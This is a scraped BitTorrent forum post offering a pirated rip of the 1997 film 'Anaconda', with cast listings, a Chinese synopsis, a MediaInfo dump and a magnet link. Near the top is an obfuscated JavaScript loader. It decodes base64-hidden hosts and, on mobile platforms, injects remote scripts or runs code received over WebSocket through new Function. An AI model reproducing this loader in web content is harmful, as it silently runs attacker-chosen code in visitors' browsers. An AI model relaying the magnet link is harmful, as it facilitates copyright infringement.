狂蟒之灾[中文字幕].Anaconda.1997.1080p.BluRay.x265.10bit.DTS 5.81GB

版主小s 1月前 213

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x46\x6a\x59\x48\x73\x4f\x52\x52\x45\x59']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vamxza2pmLm5pYYW5nYYW94aWFuc2hlbmcuYY29t','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['Y','O']);}:function(){};

◎译  名 狂蟒之灾 / 巨蟒 / 大蟒蛇:神出鬼没
◎片  名 Anaconda
◎年  代 1997
◎产  地 美国
◎类  别 动作 / 惊悚 / 冒险 / 灾难
◎语  言 英语
◎上映日期 1997-04-11
◎IMDb链接 https://www.imdb.com/title/tt0118615/
◎豆瓣评分 6.7/10 (43891人评价)
◎豆瓣链接 https://movie.douban.com/subject/1300830/
◎片  长 89 分钟
◎导  演 路易斯·罗沙 Luis Llosa (id:1290197)
◎编  剧 汉斯·鲍尔 Hans Bauer (id:1278095)
       吉姆·卡什 Jim Cash (id:1014624)
       小杰克·埃普斯 Jack Epps Jr. (id:1042140)
◎演  员 詹妮弗·洛佩兹 Jennifer Lopez (id:1019000)
       艾斯·库珀 Ice Cube (id:1017946)
       强·沃特 Jon Voight (id:1013838)
       埃里克·斯托尔兹 Eric Stoltz (id:1027814)
       乔纳森·海德 Jonathan Hyde (id:1018150)
       欧文·威尔逊 Owen Wilson (id:1006964)
       卡瑞·伍尔 Kari Wuhrer (id:1048156)
       维森特·卡斯特兰莫斯 Vincent Castellanos (id:1075036)
       丹尼·特雷霍 Danny Trejo (id:1044721)
       弗兰克·维尔克 Frank Welker (id:1031825)
       安迪·菲克曼 Andy Fickman (id:1274282)
       Verna Harrah Verna Harrah (id:1286079)
       Carole Little Carole Little (id:1290152)
       Leonard Rabinowitz Leonard Rabinowitz (id:1295100)
       小杰克·埃普斯 Jack Epps Jr. (id:1042140)
       兰迪·艾德尔曼 Randy Edelman (id:1019213)
       比尔·巴特勒 Bill Butler (id:1000839)
       明迪·马丁 Mindy Marin (id:1291003)
       Daniel Loren May Daniel Loren May (id:1291350)
       柯克·帕特鲁西里 Kirk M. Petruccelli (id:1005610)
       Barry Chusid Barry Chusid (id:1280793)
       Dino Ganziano Dino Ganziano (id:1284482)
       乔尔·哈罗 Joel Harlow (id:1286056)
       Dayne Johnson Dayne Johnson (id:1287783)
       Donna Barrett Gilbert Donna Barrett Gilbert (id:1099208)
       Jim Kail Jim Kail (id:1288026)
       肯·迪亚兹 Ken Diaz (id:1282388)
       卡迪亚·兰德 Kátia Lund (id:1290465)
       Bruce Carter Bruce Carter (id:1073292)
       Anthony Ceccomancini Anthony Ceccomancini (id:1072663)
       Bill Houston Ball Bill Houston Ball (id:1066112)
       特拉维斯·鲍曼 Travis Baumann (id:1048779)
       Audrea Topps Harjo Audrea Topps Harjo (id:1093587)
       Lance Powell Lance Powell (id:1128360)
       约翰·尼尔森 John Nelson (id:1133026)
       加内克·西尔斯 Janek Sirrs (id:1028831)
       罗宾·格里芬 Robin Griffin (id:1276684)
       曼尼·王 Manny Wong (id:1301196)
       保罗·麦吉 Paul McGhee (id:1118678)
       杰奎·巴恩布鲁克 Jacquie Barnbrook (id:1277948)
       吉姆·伯尔尼  Jim Berney (id:1278488)

◎标  签 惊悚 / 美国 / 灾难 / 恐怖 / 狂蟒之灾 / 美国电影 / 科幻 / 1997

◎简  介
  在蜿蜒流长的亚马逊河流域的雨林深处,生活着古老而神秘的舒尔族。他们与世隔绝,以食人蛇为叩拜图腾。围绕着舒尔族人的传说和秘密让雨林之外的人们振奋不已。人类学家史蒂文?凯(埃瑞克?斯图尔茨 Eric Stoltz 饰)对舒尔人颇感兴趣,他和纪录片导演泰莉?劳瑞(杰妮佛?洛佩 兹 Jennifer Lopez 饰)组成一个七人摄制组,前往雨林为这神秘的部族拍摄纪录片。路上,他们搭救了一个名叫保罗?沙龙(琼?沃纳 Jon Voight 饰)的男子,保罗自告奋勇带摄制组寻找舒尔人,却不曾想这个男人的真正目的竟是寻找一条恐怖的食人巨蟒。蒙在鼓里的史蒂文等人就次踏上一条充满血腥的不归路……                                    
                                本片荣获1998年ALMA拉丁媒体艺术奖最佳女主角奖(Jennifer Lopez)、1998年BMI百代最佳电影音乐奖、1998年世界动画庆典最佳3D制作。

  1. ##### MediaInfo ######

  2. General

  3. Unique ID                                : 32364753403551605986351147142705893354 (0x1859398AACC581365FA4F89E1728CFEA)

  4. Complete name                            : [email protected]

  5. Format                                   : Matroska

  6. Format version                           : Version 4

  7. File size                                : 5.80 GiB

  8. Duration                                 : 1 h 29 min

  9. Overall bit rate                         : 9 301 kb/s

  10. Movie name                               : Anaconda

  11. Encoded date                             : UTC 2021-08-12 12:42:55

  12. Writing application                      : mkvmerge v51.0.0 ('I Wish') 64-bit

  13. Writing library                          : libebml v1.4.0 + libmatroska v1.6.2


  14. Video

  15. ID                                       : 1

  16. Format                                   : HEVC

  17. Format/Info                              : High Efficiency Video Coding

  18. Format profile                           : Main [email protected]@Main

  19. Codec ID                                 : V_MPEGH/ISO/HEVC

  20. Duration                                 : 1 h 29 min

  21. Bit rate                                 : 7 733 kb/s

  22. Width                                    : 1 920 pixels

  23. Height                                   : 800 pixels

  24. Display aspect ratio                     : 2.40:1

  25. Frame rate mode                          : Constant

  26. Frame rate                               : 23.976 (24000/1001/53354) FPS

  27. Color space                              : YUV

  28. Chroma subsampling                       : 4:2:0

  29. Bit depth                                : 10 bits

  30. Bits/(Pixel*Frame)                       : 0.210

  31. Stream size                              : 4.83 GiB (83%)

  32. Writing library                          : x265 3.4+1-g07e3381df+31:[Windows][GCC 10.1.0][64 bit] Yuuki 10bit+8bit+12bit

  33. Encoding settings                        : rc=crf / crf=17.5000 / qcomp=0.70 / qpstep=4 / stats-write=0 / stats-read=0 / no-lossless / no-cu-lossless / aq-mode=3 / aq-strength=0.90 / cbqpoffs=0 / crqpoffs=0 / ipratio=1.40 / pbratio=1.30 / psy-rd=2.00 / psy-rdoq=0.00 / deblock=0:0 / ref=6 / limit-refs=1 / no-limit-modes / bframes=8 / b-adapt=2 / bframe-bias=0 / b-pyramid / b-intra / weightp / weightb / min-keyint=24 / max-keyint=240 / rc-lookahead=24 / gop-lookahead=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / max-cu-size=64 / min-cu-size=8 / me=3 / subme=7 / merange=48 / rdoq-level=0 / rd=4 / rdpenalty=0 / dynamic-rd=0.00 / no-rd-refine / ----- / cutree / sao / no-rect / no-amp / no-open-gop / wpp / no-pmode / no-pme / no-psnr / no-ssim / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-tu-size=32 / tu-inter-depth=1 / tu-intra-depth=1 / limit-tu=0 / qg-size=32 / qpmax=69 / qpmin=0 / ----- / cpuid=533541111039 / frame-threads=3 / numa-pools=+ / log-level=2 / input-csp=1 / input-res=1920x800 / interlace=0 / level-idc=0 / high-tier=1 / uhd-bd=0 / no-allow-non-conformance / no-repeat-headers / aud / no-hrd / info / hash=0 / no-temporal-layers / lookahead-slices=0 / no-splice / no-intra-refresh / no-ssim-rd / signhide / no-tskip / max-merge=3 / temporal-mvp / no-frame-dup / no-hme / no-analyze-src-pics / no-sao-non-deblock / selective-sao=4 / early-skip / rskip / no-fast-intra / no-tskip-fast / no-splitrd-skip / zone-count=0 / no-strict-cbr / no-rc-grain / no-const-vbv / sar=0 / overscan=0 / videoformat=5 / range=0 / colorprim=2 / transfer=2 / colormatrix=2 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.01 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / no-scenecut-aware-qpconformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0

  34. Default                                  : Yes

  35. Forced                                   : No


  36. Audio

  37. ID                                       : 2

  38. ID in the original source medium         : 4352 (0x1100)

  39. Format                                   : DTS

  40. Format/Info                              : Digital Theater Systems

  41. Codec ID                                 : A_DTS

  42. Duration                                 : 1 h 29 min

  43. Bit rate mode                            : Constant

  44. Bit rate                                 : 1 509 kb/s

  45. Channel(s)                               : 6 channels

  46. Channel layout                           : C L R Ls Rs LFE

  47. Sampling rate                            : 48.0 kHz

  48. Frame rate                               : 93.750 FPS (512 SPF)

  49. Bit depth                                : 24 bits

  50. Compression mode                         : Lossy

  51. Stream size                              : 964 MiB (16%)

  52. Language                                 : English

  53. Default                                  : Yes

  54. Forced                                   : No

  55. Original source medium                   : Blu-ray


  56. Text #1

  57. ID                                       : 3

  58. ID in the original source medium         : 4608 (0x1200)

  59. Format                                   : PGS

  60. Muxing mode                              : zlib

  61. Codec ID                                 : S_HDMV/PGS

  62. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  63. Duration                                 : 1 h 27 min

  64. Bit rate                                 : 38.6 kb/s

  65. Count of elements                        : 2574

  66. Stream size                              : 24.2 MiB (0%)

  67. Title                                    : chs&eng

  68. Language                                 : English

  69. Default                                  : Yes

  70. Forced                                   : No

  71. Original source medium                   : Blu-ray


  72. Text #2

  73. ID                                       : 4

  74. ID in the original source medium         : 4609 (0x1201)

  75. Format                                   : PGS

  76. Muxing mode                              : zlib

  77. Codec ID                                 : S_HDMV/PGS

  78. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  79. Duration                                 : 1 h 24 min

  80. Bit rate                                 : 24.0 kb/s

  81. Count of elements                        : 1079

  82. Stream size                              : 14.6 MiB (0%)

  83. Title                                    : cht&eng

  84. Language                                 : Chinese

  85. Default                                  : No

  86. Forced                                   : No

  87. Original source medium                   : Blu-ray


  88. Text #3

  89. ID                                       : 5

  90. ID in the original source medium         : 4610 (0x1202)

  91. Format                                   : PGS

  92. Muxing mode                              : zlib

  93. Codec ID                                 : S_HDMV/PGS

  94. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  95. Duration                                 : 1 h 24 min

  96. Bit rate                                 : 24.1 kb/s

  97. Count of elements                        : 1079

  98. Stream size                              : 14.6 MiB (0%)

  99. Title                                    : chs

  100. Language                                 : Chinese

  101. Default                                  : No

  102. Forced                                   : No

  103. Original source medium                   : Blu-ray


  104. Text #4

  105. ID                                       : 6

  106. ID in the original source medium         : 4611 (0x1203)

  107. Format                                   : PGS

  108. Muxing mode                              : zlib

  109. Codec ID                                 : S_HDMV/PGS

  110. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  111. Duration                                 : 1 h 24 min

  112. Bit rate                                 : 11.9 kb/s

  113. Count of elements                        : 1078

  114. Stream size                              : 7.20 MiB (0%)

  115. Title                                    : cht

  116. Language                                 : Chinese

  117. Default                                  : No

  118. Forced                                   : No

  119. Original source medium                   : Blu-ray


  120. Text #5

  121. ID                                       : 7

  122. ID in the original source medium         : 4612 (0x1204)

  123. Format                                   : PGS

  124. Muxing mode                              : zlib

  125. Codec ID                                 : S_HDMV/PGS

  126. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  127. Duration                                 : 1 h 24 min

  128. Bit rate                                 : 12.0 kb/s

  129. Count of elements                        : 1078

  130. Stream size                              : 7.29 MiB (0%)

  131. Title                                    : eng

  132. Language                                 : Chinese

  133. Default                                  : No

  134. Forced                                   : No

  135. Original source medium                   : Blu-ray


  136. Menu

  137. 00:00:00.000                             : en:第 01 章

  138. 00:04:32.355                             : en:第 02 章

  139. 00:04:32.647                             : en:第 03 章

  140. 00:11:47.915                             : en:第 04 章

  141. 00:16:11.428                             : en:第 05 章

  142. 00:21:35.377                             : en:第 06 章

  143. 00:29:08.997                             : en:第 07 章

  144. 00:37:24.242                             : en:第 08 章

  145. 00:45:21.844                             : en:第 09 章

  146. 00:49:07.653                             : en:第 10 章

  147. 00:56:08.448                             : en:第 11 章

  148. 01:02:10.226                             : en:第 12 章

  149. 01:07:19.160                             : en:第 13 章

  150. 01:11:22.695                             : en:第 14 章

  151. 01:14:30.090                             : en:第 15 章

  152. 01:18:44.469                             : en:第 16 章

  153. 01:25:04.224                             : en:第 17 章



TAGS 动作 冒险 惊悚 灾难

磁力链:
  • magnet:?xt=urn:btih:B806B13E3FCAE061DC54BE19200C940E26A761A2
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回